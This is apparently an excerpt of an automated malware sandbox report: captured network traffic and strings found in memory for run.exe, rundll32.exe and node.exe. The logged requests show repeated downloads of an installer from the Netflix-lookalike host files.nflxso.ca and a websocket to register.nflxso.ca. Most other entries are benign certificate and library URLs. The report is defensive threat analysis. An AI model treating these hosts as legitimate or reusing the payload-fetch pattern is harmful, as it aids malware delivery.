Source: global trafficHTTP traffic detected: GET /async/newtab_promos HTTP/1.1Host: www.google.comConnection: keep-aliveSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /_/scs/abc-static/_/js/k=gapi.gapi.en.SCWmpDDGjPk.O/m=gapi_iframes,googleapis_client/rt=j/sv=1/d=1/ed=1/am=AAAC/rs=AHpOoo_Pl64J0IIHlj2zBtEJ3ZwdaJC3HA/cb=gapi.loaded_0 HTTP/1.1Host: apis.google.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiUocsBCJz+zAEIhaDNAQi5ys0BCIrTzQEY9snNARjrjaUXSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /downloads/winapp/latest-installer.exe HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/5.0 (Windows) WinHTTP/Gecko Chrome/9999999Host: files.nflxso.ca
Source: global trafficHTTP traffic detected: GET /fs/windows/config.json HTTP/1.1Connection: Keep-AliveAccept: */*Accept-Encoding: identityIf-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMTRange: bytes=0-2147483646User-Agent: Microsoft BITS/7.8Host: fs.microsoft.com
Source: global trafficHTTP traffic detected: GET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=kPRasndGkvlenHk&MD=zHV46mV7 HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com
Source: global trafficHTTP traffic detected: GET /downloads/winapp/latest-installer.exe HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/5.0 (Windows) WinHTTP/Gecko Chrome/9999999Host: files.nflxso.ca
Source: global trafficHTTP traffic detected: GET /SLS/%7BE7A50285-D08D-499D-9FF8-180FDC2332BC%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=kPRasndGkvlenHk&MD=zHV46mV7 HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com
Source: global trafficHTTP traffic detected: GET /strvn HTTP/1.1Sec-WebSocket-Version: 13Sec-WebSocket-Key: R0PH52ZGGW4pHocLPSKo4A==Connection: UpgradeUpgrade: websocketSec-WebSocket-Extensions: permessage-deflate; client_max_window_bitsHost: register.nflxso.ca:6101
Source: global trafficHTTP traffic detected: GET /downloads/winapp/latest-version.txt HTTP/1.1user-agent: got (https://github.com/sindresorhus/got)accept-encoding: gzip, deflate, brHost: files.nflxso.caConnection: close
Source: run.exe, 00000002.00000003.1768566979.0000019819FC7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: .webmopenhttps://www.youtube.com/uploadexplore equals www.youtube.com (Youtube)
Source: global trafficDNS traffic detected: DNS query: files.nflxso.ca
Source: global trafficDNS traffic detected: DNS query: www.google.com
Source: global trafficDNS traffic detected: DNS query: apis.google.com
Source: global trafficDNS traffic detected: DNS query: register.nflxso.ca
Source: node.exe, 0000000F.00000002.2913751697.0000000000E01000.00000040.00000001.01000000.0000000C.sdmp, node.exe, 00000017.00000002.2240618921.0000000000E01000.00000040.00000001.01000000.0000000C.sdmpString found in binary or memory: http://.css
Source: node.exe, 0000000F.00000002.2913751697.0000000000E01000.00000040.00000001.01000000.0000000C.sdmp, node.exe, 00000017.00000002.2240618921.0000000000E01000.00000040.00000001.01000000.0000000C.sdmpString found in binary or memory: http://.jpg
Source: node.exe, 0000000F.00000002.2913751697.0000000000E01000.00000040.00000001.01000000.0000000C.sdmp, node.exe, 00000017.00000002.2240618921.0000000000E01000.00000040.00000001.01000000.0000000C.sdmpString found in binary or memory: http://code.google.com/p/closure-compiler/wiki/SourceMaps
Source: node.exe, 0000000F.00000002.2923728743.00000000043EE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.certigna.fr/certignarootca.crl01
Source: node.exe, 0000000F.00000003.2232186620.00000000043A0000.00000004.00000020.00020000.00000000.sdmp, node.exe, 0000000F.00000003.2451845105.00000000043A0000.00000004.00000020.00020000.00000000.sdmp, node.exe, 0000000F.00000003.2451094321.00000000043A0000.00000004.00000020.00020000.00000000.sdmp, node.exe, 0000000F.00000002.2923282939.000000000439C000.00000004.00000020.00020000.00000000.sdmp, node.exe, 0000000F.00000002.2922964130.00000000042D7000.00000004.00000020.00020000.00000000.sdmp, node.exe, 0000000F.00000003.2451444266.00000000042D7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
Source: node.exe, 0000000F.00000002.2922964130.00000000042D7000.00000004.00000020.00020000.00000000.sdmp, node.exe, 0000000F.00000002.2923728743.00000000043EE000.00000004.00000020.00020000.00000000.sdmp, node.exe, 0000000F.00000003.2451444266.00000000042D7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/COMODOCertificationAuthority.crl
Source: node.exe, 0000000F.00000002.2923728743.00000000043EE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.dhimyotis.com/certignarootca.crl
Source: node.exe, 0000000F.00000002.2923728743.00000000043EE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.dhimyotis.com/certignarootca.crll
Source: node.exe, 0000000F.00000002.2923728743.00000000043EE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.dhimyotis.com/certignarootca.crlo
Source: node.exe, 0000000F.00000002.2921222937.0000000001FE7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl
Source: node.exe, 0000000F.00000002.2922964130.00000000042D7000.00000004.00000020.00020000.00000000.sdmp, node.exe, 0000000F.00000003.2451444266.00000000042D7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: node.exe, 0000000F.00000002.2922964130.00000000042D7000.00000004.00000020.00020000.00000000.sdmp, node.exe, 0000000F.00000002.2923728743.00000000043EE000.00000004.00000020.00020000.00000000.sdmp, node.exe, 0000000F.00000003.2451444266.00000000042D7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.netsolssl.com/NetworkSolutionsCertificateAuthority.crl
Source: node.exe, 0000000F.00000002.2923728743.00000000043EE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.netsolssl.com/NetworkSolutionsCertificateAuthority.crlF
Source: node.exe, 0000000F.00000002.2921222937.0000000001FE7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.securetrust.com/SGCA.crl
Source: node.exe, 0000000F.00000002.2923728743.00000000043EE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.securetrust.com/SGCA.crl0
Source: node.exe, 0000000F.00000002.2921222937.0000000001FE7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.securetrust.com/STCA.crl
Source: node.exe, 0000000F.00000002.2923728743.00000000043EE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.securetrust.com/STCA.crl0
Source: node.exe, 0000000F.00000002.2921222937.0000000001FE7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.xrampsecurity.com/XGCA.crl
Source: node.exe, 0000000F.00000003.2232186620.00000000043A0000.00000004.00000020.00020000.00000000.sdmp, node.exe, 0000000F.00000003.2451845105.00000000043A0000.00000004.00000020.00020000.00000000.sdmp, node.exe, 0000000F.00000003.2451094321.00000000043A0000.00000004.00000020.00020000.00000000.sdmp, node.exe, 0000000F.00000002.2923282939.000000000439C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.xrampsecurity.com/XGCA.crl0
Source: node.exe, 0000000F.00000003.2238679421.0000000037EC0000.00000004.00001000.00020000.00000000.sdmp, node.exe, 0000000F.00000003.2149276488.0000000004391000.00000004.00000020.00020000.00000000.sdmp, node.exe, 00000017.00000003.2236306908.00000000042F9000.00000004.00000020.00020000.00000000.sdmp, node.exe, 0000001E.00000003.2307843415.0000000004399000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://files.nflxso.ca/downloads/winapp/latest-installer.exe
Source: node.exe, 00000017.00000002.2260929722.000000000E9C0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://files.nflxso.ca/downloads/winapp/latest-installer.exe9
Source: node.exe, 0000000F.00000003.2149276488.0000000004391000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://files.nflxso.ca/downloads/winapp/latest-installer.exet
Source: node.exe, 0000000F.00000003.2232924754.00000000061C0000.00000004.00001000.00020000.00000000.sdmp, node.exe, 00000017.00000003.2236306908.00000000042F9000.00000004.00000020.00020000.00000000.sdmp, node.exe, 00000017.00000002.2260929722.000000000E9C0000.00000004.00001000.00020000.00000000.sdmp, node.exe, 0000001E.00000003.2307843415.0000000004399000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://files.nflxso.ca/downloads/winapp/latest-version.txt
Source: node.exe, 0000000F.00000002.2925133957.000000001BA00000.00000004.00001000.00020000.00000000.sdmp, node.exe, 00000017.00000002.2260929722.000000000E9C0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://files.nflxso.ca/downloads/winapp/latest-version.txt9
Source: node.exe, 0000000F.00000003.2238679421.0000000037EC0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://files.nflxso.ca/downloads/winapp/latest-version.txtL%
Source: node.exe, 0000000F.00000003.2149276488.0000000004391000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://files.nflxso.ca/downloads/winapp/latest-version.txtl
Source: node.exe, 0000000F.00000002.2913751697.0000000000E01000.00000040.00000001.01000000.0000000C.sdmp, node.exe, 00000017.00000002.2240618921.0000000000E01000.00000040.00000001.01000000.0000000C.sdmpString found in binary or memory: http://html4/loose.dtd
Source: node.exe, 0000000F.00000002.2913751697.0000000000E01000.00000040.00000001.01000000.0000000C.sdmp, node.exe, 00000017.00000002.2240618921.0000000000E01000.00000040.00000001.01000000.0000000C.sdmpString found in binary or memory: http://narwhaljs.org)
Source: wnsA071.tmp, 0000000D.00000000.2110524763.000000000040A000.00000008.00000001.01000000.0000000A.sdmp, wnsA071.tmp, 0000000D.00000002.2140970835.000000000040A000.00000004.00000001.01000000.0000000A.sdmp, wnsCCC1.tmp, 00000014.00000002.2227402738.000000000040A000.00000004.00000001.01000000.0000000D.sdmp, wnsCCC1.tmp, 00000014.00000000.2197500867.000000000040A000.00000008.00000001.01000000.0000000D.sdmp, wnsF0F3.tmp, 00000019.00000002.2279706091.000000000040A000.00000004.00000001.01000000.0000000E.sdmp, wnsF0F3.tmp, 00000019.00000000.2266016309.000000000040A000.00000008.00000001.01000000.0000000E.sdmpString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: node.exe, 0000000F.00000002.2923728743.00000000043EE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.accv.es
Source: node.exe, 0000000F.00000002.2923728743.00000000043EE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.accv.es0
Source: node.exe, 0000000F.00000002.2922964130.00000000042D7000.00000004.00000020.00020000.00000000.sdmp, node.exe, 0000000F.00000002.2923728743.00000000043EE000.00000004.00000020.00020000.00000000.sdmp, node.exe, 0000000F.00000003.2451444266.00000000042D7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://repository.swisssign.com/
Source: node.exe, 0000000F.00000002.2923728743.00000000043EE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://repository.swisssign.com/0
Source: node.exe, 0000000F.00000002.2922964130.00000000042D7000.00000004.00000020.00020000.00000000.sdmp, node.exe, 0000000F.00000003.2451444266.00000000042D7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://repository.swisssign.com/T
Source: node.exe, 0000000F.00000002.2913751697.0000000000E01000.00000040.00000001.01000000.0000000C.sdmp, node.exe, 00000017.00000002.2240618921.0000000000E01000.00000040.00000001.01000000.0000000C.sdmpString found in binary or memory: http://src.chromium.org/viewvc/blink/trunk/Source/devtools/front_end/SourceMap.js
Source: run.exe, 00000002.00000003.1768566979.0000019819FC7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://support.image-line.com/member/licensebeforeshop.php?ord=%s&u=%s
Source: node.exe, 0000000F.00000002.2913751697.0000000000E01000.00000040.00000001.01000000.0000000C.sdmp, node.exe, 00000017.00000002.2240618921.0000000000E01000.00000040.00000001.01000000.0000000C.sdmpString found in binary or memory: http://userguide.icu-project.org/strings/properties
Source: node.exe, 0000000F.00000002.2913751697.0000000000E01000.00000040.00000001.01000000.0000000C.sdmp, node.exe, 00000017.00000002.2240618921.0000000000E01000.00000040.00000001.01000000.0000000C.sdmpString found in binary or memory: http://www.3waylabs.com/nw/WWW/products/wizcon/vt220.html
Source: node.exe, 0000000F.00000002.2923728743.00000000043EE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.accv.es/fileadmin/Archivos/certificados/raizaccv1.crt0
Source: node.exe, 0000000F.00000002.2922964130.00000000042D7000.00000004.00000020.00020000.00000000.sdmp, node.exe, 0000000F.00000003.2451444266.00000000042D7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.accv.es/fileadmin/Archivos/certificados/raizaccv1_der.crl
Source: node.exe, 0000000F.00000002.2923728743.00000000043EE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.accv.es/fileadmin/Archivos/certificados/raizaccv1_der.crl0
Source: node.exe, 0000000F.00000002.2923728743.00000000043EE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.accv.es/legislacion_c.htm
Source: node.exe, 0000000F.00000002.2923728743.00000000043EE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.accv.es/legislacion_c.htm0U
Source: node.exe, 0000000F.00000002.2923728743.00000000043EE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.accv.es/legislacion_c.htmICATE-----F
Source: node.exe, 0000000F.00000002.2923728743.00000000043EE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.accv.es00
Source: node.exe, 0000000F.00000002.2913751697.0000000000E01000.00000040.00000001.01000000.0000000C.sdmp, node.exe, 00000017.00000002.2240618921.0000000000E01000.00000040.00000001.01000000.0000000C.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: node.exe, 0000000F.00000002.2923728743.00000000043EE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.cert.fnmt.es/dpcs/
Source: node.exe, 0000000F.00000002.2923728743.00000000043EE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.firmaprofesional.com/cps0
Source: node.exe, 0000000F.00000002.2913751697.0000000000E01000.00000040.00000001.01000000.0000000C.sdmp, node.exe, 00000017.00000002.2240618921.0000000000E01000.00000040.00000001.01000000.0000000C.sdmpString found in binary or memory: http://www.midnight-commander.org/browser/lib/tty/key.c
Source: node.exe, 0000000F.00000003.2232186620.00000000043A0000.00000004.00000020.00020000.00000000.sdmp, node.exe, 0000000F.00000003.2451845105.00000000043A0000.00000004.00000020.00020000.00000000.sdmp, node.exe, 0000000F.00000003.2451094321.00000000043A0000.00000004.00000020.00020000.00000000.sdmp, node.exe, 0000000F.00000002.2923282939.000000000439C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.quovadisglobal.com/cps
Source: node.exe, 0000000F.00000003.2232186620.00000000043A0000.00000004.00000020.00020000.00000000.sdmp, node.exe, 0000000F.00000003.2451845105.00000000043A0000.00000004.00000020.00020000.00000000.sdmp, node.exe, 0000000F.00000003.2451094321.00000000043A0000.00000004.00000020.00020000.00000000.sdmp, node.exe, 0000000F.00000002.2923282939.000000000439C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.quovadisglobal.com/cps0
Source: node.exe, 0000000F.00000002.2913751697.0000000000E01000.00000040.00000001.01000000.0000000C.sdmp, node.exe, 00000017.00000002.2240618921.0000000000E01000.00000040.00000001.01000000.0000000C.sdmpString found in binary or memory: http://www.squid-cache.org/Doc/config/half_closed_clients/
Source: node.exe, 00000017.00000002.2240618921.0000000000E01000.00000040.00000001.01000000.0000000C.sdmpString found in binary or memory: http://www.unicode.org/copyright.html
Source: run.exe, 00000002.00000003.1768566979.0000019819FC7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.soundcloud.com/connect
Source: run.exe, 00000002.00000003.1768566979.0000019819FC7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.soundcloud.com/oauth2/token
Source: run.exe, 00000002.00000003.1768566979.0000019819FC7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.soundcloud.com/tracks
Source: node.exe, 0000000F.00000002.2913751697.0000000001801000.00000040.00000001.01000000.0000000C.sdmp, node.exe, 0000000F.00000002.2913751697.0000000000E01000.00000040.00000001.01000000.0000000C.sdmp, node.exe, 0000000F.00000002.2922785102.0000000004240000.00000004.00001000.00020000.00000000.sdmp, node.exe, 00000017.00000002.2240618921.0000000000E01000.00000040.00000001.01000000.0000000C.sdmp, node.exe, 00000017.00000002.2263968941.000000002C540000.00000004.00001000.00020000.00000000.sdmp, node.exe, 00000017.00000002.2240618921.0000000001801000.00000040.00000001.01000000.0000000C.sdmpString found in binary or memory: https://bugs.chromium.org/p/v8/issues/detail?id=6593
Source: node.exe, 0000000F.00000002.2913751697.0000000000E01000.00000040.00000001.01000000.0000000C.sdmp, node.exe, 00000017.00000002.2240618921.0000000000E01000.00000040.00000001.01000000.0000000C.sdmpString found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=745678
Source: node.exe, 0000000F.00000002.2913751697.0000000000E01000.00000040.00000001.01000000.0000000C.sdmp, node.exe, 00000017.00000002.2240618921.0000000000E01000.00000040.00000001.01000000.0000000C.sdmpString found in binary or memory: https://code.google.com/p/chromium/issues/detail?id=25916
Source: node.exe, 0000000F.00000002.2913751697.0000000000E01000.00000040.00000001.01000000.0000000C.sdmp, node.exe, 00000017.00000002.2240618921.0000000000E01000.00000040.00000001.01000000.0000000C.sdmpString found in binary or memory: https://console.spec.whatwg.org/#clear
Source: node.exe, 00000017.00000002.2240618921.0000000000E01000.00000040.00000001.01000000.0000000C.sdmpString found in binary or memory: https://console.spec.whatwg.org/#console-namespace
Source: node.exe, 0000000F.00000002.2913751697.0000000000E01000.00000040.00000001.01000000.0000000C.sdmp, node.exe, 00000017.00000002.2240618921.0000000000E01000.00000040.00000001.01000000.0000000C.sdmpString found in binary or memory: https://console.spec.whatwg.org/#count
Source: node.exe, 0000000F.00000002.2913751697.0000000000E01000.00000040.00000001.01000000.0000000C.sdmp, node.exe, 00000017.00000002.2240618921.0000000000E01000.00000040.00000001.01000000.0000000C.sdmpString found in binary or memory: https://console.spec.whatwg.org/#count-map
Source: node.exe, 0000000F.00000002.2913751697.0000000000E01000.00000040.00000001.01000000.0000000C.sdmp, node.exe, 00000017.00000002.2240618921.0000000000E01000.00000040.00000001.01000000.0000000C.sdmpString found in binary or memory: https://console.spec.whatwg.org/#countreset
Source: node.exe, 0000000F.00000002.2913751697.0000000000E01000.00000040.00000001.01000000.0000000C.sdmp, node.exe, 00000017.00000002.2240618921.0000000000E01000.00000040.00000001.01000000.0000000C.sdmpString found in binary or memory: https://console.spec.whatwg.org/#table
Source: node.exe, 0000000F.00000002.2913751697.0000000000E01000.00000040.00000001.01000000.0000000C.sdmp, node.exe, 00000017.00000002.2240618921.0000000000E01000.00000040.00000001.01000000.0000000C.sdmpString found in binary or memory: https://crbug.com/v8/7848
Source: node.exe, 0000000F.00000002.2913751697.0000000000E01000.00000040.00000001.01000000.0000000C.sdmp, node.exe, 00000017.00000002.2240618921.0000000000E01000.00000040.00000001.01000000.0000000C.sdmpString found in binary or memory: https://crbug.com/v8/8520
Source: node.exe, 0000000F.00000002.2913751697.0000000000E01000.00000040.00000001.01000000.0000000C.sdmp, node.exe, 00000017.00000002.2240618921.0000000000E01000.00000040.00000001.01000000.0000000C.sdmpString found in binary or memory: https://cs.chromium.org/chromium/src/v8/tools/SourceMap.js?rcl=dd10454c1d
Source: node.exe, 0000000F.00000002.2913751697.0000000000E01000.00000040.00000001.01000000.0000000C.sdmp, node.exe, 00000017.00000002.2240618921.0000000000E01000.00000040.00000001.01000000.0000000C.sdmpString found in binary or memory: https://developer.mozilla.org/en-US/docs/SpiderMonkey/Parser_API
Source: node.exe, 0000000F.00000002.2913751697.0000000000E01000.00000040.00000001.01000000.0000000C.sdmp, node.exe, 00000017.00000002.2240618921.0000000000E01000.00000040.00000001.01000000.0000000C.sdmpString found in binary or memory: https://developer.mozilla.org/en-US/docs/Web/JavaScript/Equality_comparisons_and_sameness#Loose_equa
Source: node.exe, 0000000F.00000002.2913751697.0000000000E01000.00000040.00000001.01000000.0000000C.sdmp, node.exe, 00000017.00000002.2240618921.0000000000E01000.00000040.00000001.01000000.0000000C.sdmpString found in binary or memory: https://encoding.spec.whatwg.org
Source: node.exe, 0000000F.00000002.2913751697.0000000000E01000.00000040.00000001.01000000.0000000C.sdmp, node.exe, 00000017.00000002.2240618921.0000000000E01000.00000040.00000001.01000000.0000000C.sdmpString found in binary or memory: https://encoding.spec.whatwg.org/#textdecoder
Source: node.exe, 0000000F.00000002.2913751697.0000000000E01000.00000040.00000001.01000000.0000000C.sdmp, node.exe, 00000017.00000002.2240618921.0000000000E01000.00000040.00000001.01000000.0000000C.sdmpString found in binary or memory: https://encoding.spec.whatwg.org/#textencoder
Source: node.exe, 0000000F.00000002.2913751697.0000000000E01000.00000040.00000001.01000000.0000000C.sdmp, node.exe, 00000017.00000002.2240618921.0000000000E01000.00000040.00000001.01000000.0000000C.sdmpString found in binary or memory: https://esdiscuss.org/topic/isconstructor#content-11
Source: rundll32.exe, 0000000A.00000002.2283478293.0000000002E10000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://files.nflxso.ca/
Source: rundll32.exe, 00000007.00000002.2229301918.0000000002F55000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://files.nflxso.ca/d
Source: rundll32.exe, 00000001.00000003.2108933637.0000000002914000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000001.00000002.2143018716.0000000002914000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000003.2195281526.0000000002F6E000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000002.2229422282.0000000002F6E000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000002.2229301918.0000000002F2A000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000A.00000002.2283478293.0000000002DDA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://files.nflxso.ca/downloads/winapp/latest-installer.exe
Source: rundll32.exe, 0000000A.00000003.2261300042.0000000002E2B000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000A.00000002.2284164999.0000000002E2B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://files.nflxso.ca/downloads/winapp/latest-installer.exe-
Source: rundll32.exe, 00000007.00000002.2229301918.0000000002F2A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://files.nflxso.ca/downloads/winapp/latest-installer.exe3
Source: node.exe, 0000000F.00000003.2232924754.00000000061C0000.00000004.00001000.00020000.00000000.sdmp, node.exe, 0000000F.00000002.2922870834.0000000004284000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://files.nflxso.ca/downloads/winapp/latest-version.txt
Source: node.exe, 0000000F.00000003.2232924754.00000000061C0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://files.nflxso.ca/downloads/winapp/latest-version.txt1
Source: node.exe, 0000000F.00000003.2232924754.00000000061C0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://files.nflxso.ca/downloads/winapp/latest-version.txt1%
Source: node.exe, 0000000F.00000003.2232924754.00000000061C0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://files.nflxso.ca/downloads/winapp/latest-version.txt;
Source: rundll32.exe, 00000001.00000002.2142874146.00000000028CA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://files.nflxso.ca/t
Source: rundll32.exe, 00000001.00000003.2108933637.0000000002914000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000003.2195281526.0000000002F6E000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000A.00000003.2261300042.0000000002E2B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://files.nflxso.ca:443/downloads/winapp/latest-installer.exe
Source: run.exe, 00000002.00000003.1768566979.000001981A9C7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://forum.image-line.com/
Source: node.exe, 0000000F.00000002.2913751697.0000000000E01000.00000040.00000001.01000000.0000000C.sdmp, node.exe, 00000017.00000002.2240618921.0000000000E01000.00000040.00000001.01000000.0000000C.sdmpString found in binary or memory: https://gist.github.com/XVilka/8346728#gistcomment-2823421
Source: node.exe, 0000000F.00000002.2913751697.0000000000E01000.00000040.00000001.01000000.0000000C.sdmp, node.exe, 00000017.00000002.2240618921.0000000000E01000.00000040.00000001.01000000.0000000C.sdmpString found in binary or memory: https://github.com/acornjs/acorn/blob/master/acorn/src/identifier.js#L23
Source: node.exe, 0000000F.00000002.2913751697.0000000000E01000.00000040.00000001.01000000.0000000C.sdmp, node.exe, 00000017.00000002.2240618921.0000000000E01000.00000040.00000001.01000000.0000000C.sdmpString found in binary or memory: https://github.com/acornjs/acorn/issues/575
Source: node.exe, 0000000F.00000002.2913751697.0000000000E01000.00000040.00000001.01000000.0000000C.sdmp, node.exe, 00000017.00000002.2240618921.0000000000E01000.00000040.00000001.01000000.0000000C.sdmpString found in binary or memory: https://github.com/antirez/linenoise
Source: node.exe, 0000000F.00000002.2913751697.0000000000E01000.00000040.00000001.01000000.0000000C.sdmp, node.exe, 00000017.00000002.2240618921.0000000000E01000.00000040.00000001.01000000.0000000C.sdmpString found in binary or memory: https://github.com/chalk/ansi-regex/blob/master/index.js
Source: node.exe, 0000000F.00000002.2913751697.0000000000E01000.00000040.00000001.01000000.0000000C.sdmp, node.exe, 00000017.00000002.2240618921.0000000000E01000.00000040.00000001.01000000.0000000C.sdmpString found in binary or memory: https://github.com/chalk/supports-color
Source: node.exe, 0000000F.00000002.2913751697.0000000000E01000.00000040.00000001.01000000.0000000C.sdmp, node.exe, 00000017.00000002.2240618921.0000000000E01000.00000040.00000001.01000000.0000000C.sdmpString found in binary or memory: https://github.com/da-x/rxvt-unicode/tree/v9.22-with-24bit-color
Source: node.exe, 0000000F.00000002.2913751697.0000000000E01000.00000040.00000001.01000000.0000000C.sdmp, node.exe, 00000017.00000002.2240618921.0000000000E01000.00000040.00000001.01000000.0000000C.sdmpString found in binary or memory: https://github.com/estree/estree/blob/a27003adf4fd7bfad44de9cef372a2eacd527b1c/es5.md#regexpliteral
Source: node.exe, 0000000F.00000002.2913751697.0000000000E01000.00000040.00000001.01000000.0000000C.sdmp, node.exe, 00000017.00000002.2240618921.0000000000E01000.00000040.00000001.01000000.0000000C.sdmpString found in binary or memory: https://github.com/google/caja/blob/master/src/com/google/caja/ses/repairES5.js
Source: node.exe, 0000000F.00000002.2913751697.0000000000E01000.00000040.00000001.01000000.0000000C.sdmp, node.exe, 00000017.00000002.2240618921.0000000000E01000.00000040.00000001.01000000.0000000C.sdmpString found in binary or memory: https://github.com/google/caja/blob/master/src/com/google/caja/ses/startSES.js
Source: node.exe, 0000000F.00000002.2913751697.0000000000E01000.00000040.00000001.01000000.0000000C.sdmp, node.exe, 00000017.00000002.2240618921.0000000000E01000.00000040.00000001.01000000.0000000C.sdmpString found in binary or memory: https://github.com/google/closure-compiler/wiki/Source-Maps
Source: node.exe, 0000000F.00000002.2913751697.0000000000E01000.00000040.00000001.01000000.0000000C.sdmp, node.exe, 00000017.00000002.2240618921.0000000000E01000.00000040.00000001.01000000.0000000C.sdmpString found in binary or memory: https://github.com/isaacs/color-support.
Source: node.exe, 0000000F.00000002.2913751697.0000000000E01000.00000040.00000001.01000000.0000000C.sdmp, node.exe, 00000017.00000002.2240618921.0000000000E01000.00000040.00000001.01000000.0000000C.sdmpString found in binary or memory: https://github.com/joyent/node/issues/3295.
Source: node.exe, 0000000F.00000002.2913751697.0000000000E01000.00000040.00000001.01000000.0000000C.sdmp, node.exe, 00000017.00000002.2240618921.0000000000E01000.00000040.00000001.01000000.0000000C.sdmpString found in binary or memory: https://github.com/mafintosh/end-of-stream
Source: node.exe, 0000000F.00000002.2913751697.0000000000E01000.00000040.00000001.01000000.0000000C.sdmp, node.exe, 00000017.00000002.2240618921.0000000000E01000.00000040.00000001.01000000.0000000C.sdmpString found in binary or memory: https://github.com/mafintosh/pump
